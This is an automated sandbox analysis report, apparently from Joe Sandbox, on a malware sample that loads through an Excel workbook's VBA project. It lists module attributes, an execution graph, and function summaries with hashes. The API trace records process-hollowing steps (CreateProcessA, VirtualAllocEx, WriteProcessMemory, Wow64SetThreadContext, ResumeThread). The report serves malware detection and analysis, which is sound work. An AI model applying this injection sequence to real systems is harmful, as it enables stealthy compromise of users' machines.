
                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    Module: Sheet3

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Sheet3"

                    2

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    Module: ThisWorkbook

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "ThisWorkbook"

                    2

                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    Reset < >

                      Execution Graph

                      Execution Coverage:16.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:138
                      Total number of Limit Nodes:2
                      execution_graph 7084 1e84068 7085 1e840ca 7084->7085 7086 1e84072 7084->7086 7089 1e84978 7086->7089 7110 1e84988 7086->7110 7090 1e84962 7089->7090 7091 1e8497b 7089->7091 7090->7085 7091->7090 7130 1e84f1d 7091->7130 7137 1e84e5c 7091->7137 7145 1e84ebc 7091->7145 7150 1e851c4 7091->7150 7155 1e85304 7091->7155 7160 1e85121 7091->7160 7165 1e84ee0 7091->7165 7170 1e854ef 7091->7170 7174 1e8524f 7091->7174 7179 1e855ad 7091->7179 7183 1e8534b 7091->7183 7187 1e8518a 7091->7187 7192 1e85157 7091->7192 7197 1e851b2 7091->7197 7202 1e85310 7091->7202 7207 1e8545f 7091->7207 7212 1e84f7e 7091->7212 7092 1e849c6 7092->7085 7111 1e849a2 7110->7111 7113 1e8518a 2 API calls 7111->7113 7114 1e8534b 2 API calls 7111->7114 7115 1e855ad 2 API calls 7111->7115 7116 1e8524f 2 API calls 7111->7116 7117 1e854ef 2 API calls 7111->7117 7118 1e84ee0 2 API calls 7111->7118 7119 1e85121 2 API calls 7111->7119 7120 1e85304 2 API calls 7111->7120 7121 1e851c4 2 API calls 7111->7121 7122 1e84ebc 2 API calls 7111->7122 7123 1e84e5c 4 API calls 7111->7123 7124 1e84f1d 4 API calls 7111->7124 7125 1e84f7e 2 API calls 7111->7125 7126 1e8545f 2 API calls 7111->7126 7127 1e85310 2 API calls 7111->7127 7128 1e851b2 2 API calls 7111->7128 7129 1e85157 2 API calls 7111->7129 7112 1e849c6 7112->7085 7113->7112 7114->7112 7115->7112 7116->7112 7117->7112 7118->7112 7119->7112 7120->7112 7121->7112 7122->7112 7123->7112 7124->7112 7125->7112 7126->7112 7127->7112 7128->7112 7129->7112 7217 1e83628 7130->7217 7221 1e83622 7130->7221 7131 1e84ec8 7131->7092 7132 1e8551a 7131->7132 7225 1e838aa 7131->7225 7229 1e838b0 7131->7229 7132->7092 7138 1e84e62 7137->7138 7233 1e83ae8 7138->7233 7237 1e83ae6 7138->7237 7139 1e84e96 7139->7092 7140 1e8551a 7139->7140 7141 1e838aa ReadProcessMemory 7139->7141 7142 1e838b0 ReadProcessMemory 7139->7142 7140->7092 7141->7140 7142->7140 7147 1e84ec8 7145->7147 7146 1e8551a 7146->7092 7147->7092 7147->7146 7148 1e838aa ReadProcessMemory 7147->7148 7149 1e838b0 ReadProcessMemory 7147->7149 7148->7146 7149->7146 7151 1e851de 7150->7151 7241 1e83408 7151->7241 7245 1e83406 7151->7245 7152 1e851f3 7152->7152 7157 1e84ec8 7155->7157 7156 1e8551a 7156->7092 7157->7092 7157->7156 7158 1e838aa ReadProcessMemory 7157->7158 7159 1e838b0 ReadProcessMemory 7157->7159 7158->7156 7159->7156 7161 1e8512f 7160->7161 7163 1e83408 ResumeThread 7161->7163 7164 1e83406 ResumeThread 7161->7164 7162 1e851f3 7162->7162 7163->7162 7164->7162 7166 1e84ec8 7165->7166 7166->7092 7167 1e8551a 7166->7167 7168 1e838aa ReadProcessMemory 7166->7168 7169 1e838b0 ReadProcessMemory 7166->7169 7167->7092 7168->7167 7169->7167 7171 1e8551a 7170->7171 7172 1e838aa ReadProcessMemory 7170->7172 7173 1e838b0 ReadProcessMemory 7170->7173 7171->7092 7172->7171 7173->7171 7176 1e84ec8 7174->7176 7175 1e8551a 7175->7092 7176->7092 7176->7175 7177 1e838aa ReadProcessMemory 7176->7177 7178 1e838b0 ReadProcessMemory 7176->7178 7177->7175 7178->7175 7180 1e856a5 7179->7180 7249 1e83748 7180->7249 7253 1e83750 7180->7253 7257 1e834f8 7183->7257 7261 1e834f6 7183->7261 7184 1e85365 7189 1e84ec8 7187->7189 7188 1e8551a 7188->7092 7189->7092 7189->7187 7189->7188 7190 1e838aa ReadProcessMemory 7189->7190 7191 1e838b0 ReadProcessMemory 7189->7191 7190->7188 7191->7188 7193 1e84ec8 7192->7193 7193->7092 7194 1e8551a 7193->7194 7195 1e838aa ReadProcessMemory 7193->7195 7196 1e838b0 ReadProcessMemory 7193->7196 7194->7092 7195->7194 7196->7194 7198 1e851b6 7197->7198 7200 1e838aa ReadProcessMemory 7198->7200 7201 1e838b0 ReadProcessMemory 7198->7201 7199 1e8551a 7199->7092 7200->7199 7201->7199 7204 1e84ec8 7202->7204 7203 1e8551a 7203->7092 7204->7092 7204->7203 7205 1e838aa ReadProcessMemory 7204->7205 7206 1e838b0 ReadProcessMemory 7204->7206 7205->7203 7206->7203 7208 1e85465 7207->7208 7210 1e83748 WriteProcessMemory 7208->7210 7211 1e83750 WriteProcessMemory 7208->7211 7209 1e85631 7210->7209 7211->7209 7213 1e84fa1 7212->7213 7215 1e83748 WriteProcessMemory 7213->7215 7216 1e83750 WriteProcessMemory 7213->7216 7214 1e853d7 7215->7214 7216->7214 7218 1e8366c VirtualAllocEx 7217->7218 7220 1e836ea 7218->7220 7220->7131 7222 1e83628 VirtualAllocEx 7221->7222 7224 1e836ea 7222->7224 7224->7131 7226 1e838fc ReadProcessMemory 7225->7226 7228 1e8397a 7226->7228 7228->7132 7230 1e838fc ReadProcessMemory 7229->7230 7232 1e8397a 7230->7232 7232->7132 7234 1e83b6f CreateProcessA 7233->7234 7236 1e83dcd 7234->7236 7238 1e83b6f CreateProcessA 7237->7238 7240 1e83dcd 7238->7240 7242 1e8344c ResumeThread 7241->7242 7244 1e8349e 7242->7244 7244->7152 7246 1e8344c ResumeThread 7245->7246 7248 1e8349e 7246->7248 7248->7152 7250 1e8379c WriteProcessMemory 7249->7250 7252 1e8383b 7250->7252 7252->7180 7254 1e8379c WriteProcessMemory 7253->7254 7256 1e8383b 7254->7256 7256->7180 7258 1e83541 Wow64SetThreadContext 7257->7258 7260 1e835bf 7258->7260 7260->7184 7262 1e83541 Wow64SetThreadContext 7261->7262 7264 1e835bf 7262->7264 7264->7184

                      Executed Functions

                      Function 00433D98 Relevance: 8.2, Strings: 6, Instructions: 741COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 433d98-433dca 2 433dd0-433e64 0->2 3 4342fb-434319 0->3 28 433e70-433ec7 2->28 29 433e66-433e6a 2->29 6 434714-434720 3->6 8 434327-434333 6->8 9 434726 6->9 11 434339-4343b9 8->11 12 434728-43472d 8->12 10 434738-43473f 9->10 30 4343d1-4343ea 11->30 31 4343bb-4343c1 11->31 12->10 55 434245-434269 28->55 56 433ecd-433ed5 28->56 29->28 37 43441a-434458 30->37 38 4343ec-434415 30->38 32 4343c3 31->32 33 4343c5-4343c7 31->33 32->30 33->30 51 43445a-43447b 37->51 52 43447d-43448a 37->52 48 434711 38->48 48->6 61 434491-434497 51->61 52->61 65 4342ed-4342f8 55->65 58 433ed7-433edb 56->58 59 433edc-433ee4 56->59 58->59 62 433ee6 59->62 63 433ee9-433f0b 59->63 66 4344b6-434508 61->66 67 434499-4344b4 61->67 62->63 71 433f10-433f16 63->71 72 433f0d 63->72 65->3 101 434623-434662 66->101 102 43450e-434513 66->102 67->66 75 4341c5-4341d0 71->75 76 433f1c-433f36 71->76 72->71 78 4341d2 75->78 79 4341d5-43420c call 430b74 75->79 80 433f7b-433f84 76->80 81 433f38-433f3c 76->81 78->79 115 43423a-43423f 79->115 116 43420e-434238 79->116 83 433f8a-433f9a 80->83 84 4342e8 80->84 81->80 85 433f3e-433f49 81->85 83->84 86 433fa0-433fb1 83->86 84->65 87 433fd7-434084 85->87 88 433f4f 85->88 86->84 92 433fb7-433fc7 86->92 103 434086 87->103 104 434094-43415c 87->104 93 433f52-433f54 88->93 92->84 98 433fcd-433fd4 92->98 94 433f56 93->94 95 433f5a-433f65 93->95 94->95 95->84 100 433f6b-433f77 95->100 98->87 100->93 105 433f79 100->105 125 434664-43467c 101->125 126 43467e-43468d 101->126 109 43451d-434520 102->109 103->104 107 434088-43408e 103->107 122 434162-434166 104->122 123 43426e-434280 104->123 105->87 107->104 112 434526 109->112 113 4345eb-434613 109->113 117 43458f-4345bb 112->117 118 43455e-43458a 112->118 119 43452d-434559 112->119 120 4345bd-4345e9 112->120 124 434619-43461d 113->124 115->55 116->115 117->124 118->124 119->124 120->124 122->123 129 43416c-43417b 122->129 123->84 128 434282-43429f 123->128 124->101 124->109 133 434696-4346f8 125->133 126->133 128->84 135 4342a1-4342bd 128->135 136 4341bb-4341bf 129->136 137 43417d 129->137 148 434703-43470a 133->148 135->84 138 4342bf-4342dd 135->138 136->75 136->76 139 434183-434185 137->139 138->84 142 4342df 138->142 143 434187-43418b 139->143 144 43418f-4341ab 139->144 142->84 143->144 144->84 146 4341b1-4341b9 144->146 146->136 146->139 148->48
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'p$TJp$Tep$pp$sk?$xbp
                      • API String ID: 0-448541618
                      • Opcode ID: a0c3587b61cfbec8e748a1242178221b9fa8da8e13811f38c7736dac0cac7646
                      • Instruction ID: 0c9d584e7d348839537676bde4359a63596aaabeeb987eb18b38eed4a0ac6a1a
                      • Opcode Fuzzy Hash: a0c3587b61cfbec8e748a1242178221b9fa8da8e13811f38c7736dac0cac7646
                      • Instruction Fuzzy Hash: EF624835A001149FDB04DFA8D984F99BBB2FF89304F1681A9E509AB366CB35ED91CF40
                      Function 004304C8 Relevance: 2.9, Strings: 1, Instructions: 1698COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 190 4304c8-4311a3 194 4311a5 190->194 195 4311aa-431740 call 430788 * 2 call 430798 * 2 call 4307a8 * 2 call 4307b8 call 4307a8 * 2 call 430788 call 4307c8 call 4307a8 call 4307d8 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 190->195 194->195 283 431909-43191c 195->283 284 431922-432148 call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 call 430d78 call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d68 call 430d98 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d68 call 430d98 call 4307f8 call 430808 call 430818 call 430828 call 430da8 283->284 285 431745-43174c 283->285 408 43214a 284->408 409 43214f-43221f call 430db8 284->409 286 431787-431798 285->286 287 43179a-4317cf 286->287 288 43174e-43177b 286->288 292 4317d1 287->292 293 4317d6-4317fd 287->293 290 431783-431784 288->290 291 43177d-431782 288->291 290->286 291->290 292->293 295 431804-431848 293->295 296 4317ff 293->296 299 43184a 295->299 300 43184f-431890 295->300 296->295 299->300 301 431892 300->301 302 431897-4318b8 300->302 301->302 304 4318f2-431903 302->304 305 431905-431906 304->305 306 4318ba-4318e7 304->306 305->283 308 4318e9-4318ed 306->308 309 4318ee-4318ef 306->309 308->309 309->304 408->409 417 43222a-432db0 call 430d68 call 430dc8 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d98 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d98 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 4307f8 call 430808 call 430818 call 430dd8 call 430de8 call 430df8 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d98 call 430e08 call 430e18 call 430e28 call 430e38 * 12 call 430808 call 430e48 call 430e58 call 430e68 409->417
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: Ppp
                      • API String ID: 0-99483665
                      • Opcode ID: 730c3141bc54b1828f3bdf4090ed1006b03b9e3af7df3246b827fa792f7c400a
                      • Instruction ID: 4ddb5a7686f8486dbd9debf8037b398998ecb78cbc3d1b1b951f28aeff557a99
                      • Opcode Fuzzy Hash: 730c3141bc54b1828f3bdf4090ed1006b03b9e3af7df3246b827fa792f7c400a
                      • Instruction Fuzzy Hash: 5803F534A5121ACFCB64EF64C894AE9B7B1FF89304F5156E9E4096B361DB34AE81CF40
                      Function 00431168 Relevance: 2.8, Strings: 1, Instructions: 1545COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 576 431168-431175 577 431183-4311a3 576->577 578 431177-43117d 576->578 579 4311a5 577->579 580 4311aa-431516 call 430788 * 2 call 430798 * 2 call 4307a8 * 2 call 4307b8 call 4307a8 * 2 call 430788 call 4307c8 call 4307a8 call 4307d8 call 4307e8 577->580 578->577 579->580 641 431520-431534 call 4307f8 580->641 643 431539-431740 call 430808 call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 641->643 668 431909-43191c 643->668 669 431922-4320ff call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 call 430d78 call 430818 call 430828 call 430d68 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d68 call 430d98 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d68 call 430d98 call 4307f8 call 430808 call 430818 call 430828 call 430da8 668->669 670 431745-43174c 668->670 790 432105-432132 669->790 671 431787-431798 670->671 672 43179a-4317cf 671->672 673 43174e-43177b 671->673 677 4317d1 672->677 678 4317d6-4317fd 672->678 675 431783-431784 673->675 676 43177d-431782 673->676 675->671 676->675 677->678 680 431804-431848 678->680 681 4317ff 678->681 684 43184a 680->684 685 43184f-431890 680->685 681->680 684->685 686 431892 685->686 687 431897-4318b8 685->687 686->687 689 4318f2-431903 687->689 690 431905-431906 689->690 691 4318ba-4318e7 689->691 690->668 693 4318e9-4318ed 691->693 694 4318ee-4318ef 691->694 693->694 694->689 792 432138-432148 790->792 793 43214a 792->793 794 43214f-4321f6 call 430db8 792->794 793->794 801 432201-43221f 794->801 802 43222a-432db0 call 430d68 call 430dc8 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d98 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d98 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 4307f8 call 430808 call 430818 call 430dd8 call 430de8 call 430df8 call 4307e8 call 4307f8 call 430808 call 430818 call 430828 call 430d88 call 430d98 call 430e08 call 430e18 call 430e28 call 430e38 * 12 call 430808 call 430e48 call 430e58 call 430e68 801->802
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: Ppp
                      • API String ID: 0-99483665
                      • Opcode ID: 887a340834e95462cc3f0232b27454e04cfdcc6ce23a40973d0a758ee00f26e9
                      • Instruction ID: 7d9c133226ccb8dce22ebfb45d3be69a7ddb5a14f8bae7ae057c993421356ad3
                      • Opcode Fuzzy Hash: 887a340834e95462cc3f0232b27454e04cfdcc6ce23a40973d0a758ee00f26e9
                      • Instruction Fuzzy Hash: B1F2E734A51219CFC7A4EF24C894AE9B7B1FF89304F5156E9E4096B361DB35AE81CF40
                      Function 00434B55 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 149 434b55-434bd6 158 434bd8-434bde 149->158 159 434bee-434c41 149->159 160 434be2-434be4 158->160 161 434be0 158->161 167 434c43-434c49 159->167 168 434c59-434c7a 159->168 160->159 161->159 169 434c4b 167->169 170 434c4d-434c4f 167->170 185 434c7c call 43ab70 168->185 186 434c7c call 43ab80 168->186 169->168 170->168 173 434c82-434cf7 187 434cf9 call 43b3a1 173->187 188 434cf9 call 43b2b0 173->188 189 434cf9 call 43b2d8 173->189 182 434cff-434d23 185->173 186->173 187->182 188->182 189->182
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: $p$$p$$p$$p
                      • API String ID: 0-3121760203
                      • Opcode ID: 430ed620c755fb4b6eac1d7e683e3d8b3852b8e5d5ab069ecf558f8564e2d53e
                      • Instruction ID: 333dc698641bdb1fee54a6d3cfd63ced80ae959edfeb489369675fe8d29e6c97
                      • Opcode Fuzzy Hash: 430ed620c755fb4b6eac1d7e683e3d8b3852b8e5d5ab069ecf558f8564e2d53e
                      • Instruction Fuzzy Hash: 54417734B002049FD7189F78DC55BAE7BE6EBC8700F248069E506DB3A9DE799C05CB55
                      Function 0043DBE8 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 961 43dbe8-43dc0b 962 43dc12-43de01 call 430b74 call 43db90 961->962 963 43dc0d 961->963 981 43de07 962->981 982 43dc5d-43dc62 962->982 963->962 983 43dd15-43dd35 982->983 984 43dc68-43dc69 982->984 986 43dd3b-43dd3c call 430c38 983->986 987 43ddce-43dde3 983->987 984->983 997 43dcef-43dcf9 986->997
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: Tep$Tep
                      • API String ID: 0-347264811
                      • Opcode ID: edb8543be9a22b36bacf8b643a537e0cdb8d7bf8acf532f2301b4026a58167fa
                      • Instruction ID: b09ada7b7de048412203f8f169a78fb35efe999e5c18acf4fa9324f0ba9a64a9
                      • Opcode Fuzzy Hash: edb8543be9a22b36bacf8b643a537e0cdb8d7bf8acf532f2301b4026a58167fa
                      • Instruction Fuzzy Hash: 6C61D474E042088FDB08CFAAD894AEDFBB6BF8D300F24A02AD519AB355D7745946CF54
                      Function 00434980 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 998 434980-4349db call 434da0 1002 4349e1-434a29 call 430b74 call 433980 call 430bac 998->1002 1012 434a2c-434a57 1002->1012 1015 434a59-434a74 1012->1015 1016 434a7c-434a7e 1012->1016 1015->1016 1016->1012 1017 434a80-434aef 1016->1017 1026 434af1-434b06 1017->1026 1027 434b0f 1017->1027 1026->1027
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: Tep$Tep
                      • API String ID: 0-347264811
                      • Opcode ID: 0fe754c7445cfb10466cd5d37116c6ace77463bb9fecfe62f512bda2dcd82de0
                      • Instruction ID: 64ebcc5d19a0b2e043081fbf8e262a5438634b1adcddafa0c2929ae22e7934da
                      • Opcode Fuzzy Hash: 0fe754c7445cfb10466cd5d37116c6ace77463bb9fecfe62f512bda2dcd82de0
                      • Instruction Fuzzy Hash: C441A270B011049BD718AFA8D46ABAF7BA6EBCC305F20806DE5069B3C9CF7C9D058795
                      Function 01E83AE6 Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1035 1e83ae6-1e83b81 1037 1e83bca-1e83bf2 1035->1037 1038 1e83b83-1e83b9a 1035->1038 1042 1e83c38-1e83c8e 1037->1042 1043 1e83bf4-1e83c08 1037->1043 1038->1037 1041 1e83b9c-1e83ba1 1038->1041 1044 1e83ba3-1e83bad 1041->1044 1045 1e83bc4-1e83bc7 1041->1045 1052 1e83c90-1e83ca4 1042->1052 1053 1e83cd4-1e83dcb CreateProcessA 1042->1053 1043->1042 1050 1e83c0a-1e83c0f 1043->1050 1047 1e83baf 1044->1047 1048 1e83bb1-1e83bc0 1044->1048 1045->1037 1047->1048 1048->1048 1051 1e83bc2 1048->1051 1054 1e83c11-1e83c1b 1050->1054 1055 1e83c32-1e83c35 1050->1055 1051->1045 1052->1053 1061 1e83ca6-1e83cab 1052->1061 1071 1e83dcd-1e83dd3 1053->1071 1072 1e83dd4-1e83eb9 1053->1072 1056 1e83c1d 1054->1056 1057 1e83c1f-1e83c2e 1054->1057 1055->1042 1056->1057 1057->1057 1060 1e83c30 1057->1060 1060->1055 1063 1e83cad-1e83cb7 1061->1063 1064 1e83cce-1e83cd1 1061->1064 1065 1e83cb9 1063->1065 1066 1e83cbb-1e83cca 1063->1066 1064->1053 1065->1066 1066->1066 1067 1e83ccc 1066->1067 1067->1064 1071->1072 1084 1e83ec9-1e83ecd 1072->1084 1085 1e83ebb-1e83ebf 1072->1085 1087 1e83edd-1e83ee1 1084->1087 1088 1e83ecf-1e83ed3 1084->1088 1085->1084 1086 1e83ec1 1085->1086 1086->1084 1090 1e83ef1-1e83ef5 1087->1090 1091 1e83ee3-1e83ee7 1087->1091 1088->1087 1089 1e83ed5 1088->1089 1089->1087 1092 1e83f2b-1e83f36 1090->1092 1093 1e83ef7-1e83f20 1090->1093 1091->1090 1094 1e83ee9 1091->1094 1098 1e83f37 1092->1098 1093->1092 1094->1090 1098->1098
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01E83DAF
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 96d1818d9e9a8f650e8784ac3ba5bdaac20239876f86d42d7c46ea79c79f539a
                      • Instruction ID: c4850441eb293ddc662b0a311d76f465cbeb014cd82d9599fe6e8f802f15e1e2
                      • Opcode Fuzzy Hash: 96d1818d9e9a8f650e8784ac3ba5bdaac20239876f86d42d7c46ea79c79f539a
                      • Instruction Fuzzy Hash: AFC12670D002598FDF25DFA8C841BEEBBB1BF09304F0495A9E959B7290DB749A85CF90
                      Function 01E83AE8 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1099 1e83ae8-1e83b81 1101 1e83bca-1e83bf2 1099->1101 1102 1e83b83-1e83b9a 1099->1102 1106 1e83c38-1e83c8e 1101->1106 1107 1e83bf4-1e83c08 1101->1107 1102->1101 1105 1e83b9c-1e83ba1 1102->1105 1108 1e83ba3-1e83bad 1105->1108 1109 1e83bc4-1e83bc7 1105->1109 1116 1e83c90-1e83ca4 1106->1116 1117 1e83cd4-1e83dcb CreateProcessA 1106->1117 1107->1106 1114 1e83c0a-1e83c0f 1107->1114 1111 1e83baf 1108->1111 1112 1e83bb1-1e83bc0 1108->1112 1109->1101 1111->1112 1112->1112 1115 1e83bc2 1112->1115 1118 1e83c11-1e83c1b 1114->1118 1119 1e83c32-1e83c35 1114->1119 1115->1109 1116->1117 1125 1e83ca6-1e83cab 1116->1125 1135 1e83dcd-1e83dd3 1117->1135 1136 1e83dd4-1e83eb9 1117->1136 1120 1e83c1d 1118->1120 1121 1e83c1f-1e83c2e 1118->1121 1119->1106 1120->1121 1121->1121 1124 1e83c30 1121->1124 1124->1119 1127 1e83cad-1e83cb7 1125->1127 1128 1e83cce-1e83cd1 1125->1128 1129 1e83cb9 1127->1129 1130 1e83cbb-1e83cca 1127->1130 1128->1117 1129->1130 1130->1130 1131 1e83ccc 1130->1131 1131->1128 1135->1136 1148 1e83ec9-1e83ecd 1136->1148 1149 1e83ebb-1e83ebf 1136->1149 1151 1e83edd-1e83ee1 1148->1151 1152 1e83ecf-1e83ed3 1148->1152 1149->1148 1150 1e83ec1 1149->1150 1150->1148 1154 1e83ef1-1e83ef5 1151->1154 1155 1e83ee3-1e83ee7 1151->1155 1152->1151 1153 1e83ed5 1152->1153 1153->1151 1156 1e83f2b-1e83f36 1154->1156 1157 1e83ef7-1e83f20 1154->1157 1155->1154 1158 1e83ee9 1155->1158 1162 1e83f37 1156->1162 1157->1156 1158->1154 1162->1162
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01E83DAF
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 15438ae3a3034f955459bfb74eb17d00a530c193c195994ae59bbde4c804d6b6
                      • Instruction ID: 371ad483c7b81d721f6319228149afd9bdc792c8f38cee29a33b83c8bd79bde0
                      • Opcode Fuzzy Hash: 15438ae3a3034f955459bfb74eb17d00a530c193c195994ae59bbde4c804d6b6
                      • Instruction Fuzzy Hash: B0C12570D002198FDF25DFA8C841BEEBBB1BF09304F0095A9E919B7290DB749A85CF94
                      Function 01E83748 Relevance: 1.6, APIs: 1, Instructions: 123injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1163 1e83748-1e837bb 1165 1e837bd-1e837cf 1163->1165 1166 1e837d2-1e83839 WriteProcessMemory 1163->1166 1165->1166 1168 1e8383b-1e83841 1166->1168 1169 1e83842-1e83894 1166->1169 1168->1169
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01E83823
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 152e87eab9e802045c477536edac66d44f66d6c583e091d4a448d56086d74a35
                      • Instruction ID: a5edf7833c3cbe7ab433fe6b90529d4862472ae70384a8bcb75dd00be30bb7a3
                      • Opcode Fuzzy Hash: 152e87eab9e802045c477536edac66d44f66d6c583e091d4a448d56086d74a35
                      • Instruction Fuzzy Hash: 3941BBB5D012589FCF10CFA9D984AEEFBF1BB49314F24942AE818B7250D334AA45CF54
                      Function 01E83750 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1174 1e83750-1e837bb 1176 1e837bd-1e837cf 1174->1176 1177 1e837d2-1e83839 WriteProcessMemory 1174->1177 1176->1177 1179 1e8383b-1e83841 1177->1179 1180 1e83842-1e83894 1177->1180 1179->1180
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01E83823
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 292d622cd250ebe5a73d16f8ecd94a418a70e9b0aeefadab745db04449663780
                      • Instruction ID: f05f22ea20809ddf9dd5d458d71370bb7429fe16142a14fb181911fdf7cca533
                      • Opcode Fuzzy Hash: 292d622cd250ebe5a73d16f8ecd94a418a70e9b0aeefadab745db04449663780
                      • Instruction Fuzzy Hash: DE41AAB5D012489FCF10CFA9D984AEEFBF1BB49314F24942AE818B7250D334AA45CF64
                      Function 01E838AA Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
